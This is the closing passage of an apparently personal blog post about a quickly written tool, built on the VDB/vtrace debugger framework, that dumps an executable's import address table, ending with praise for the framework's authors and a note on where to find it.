So there you have it. Fairly straight-forward code to dump all the imports for your executable's IAT! I cranked this out in a single night while drinking beer and relaxing, so needless to say - this tool makes for some extremely fast prototyping of awesome debugger stuff!
Looking into the ridiculously extensive sourcecode for VDB, I can only conclude that @invisig0th and @at1as are simply smart people, and are just swimming in 0-days.

There's no way to hold THAT many 0-days!
NOTE: VDB's main site isn't currently hosting VDB/vtrace right now, but you can find it here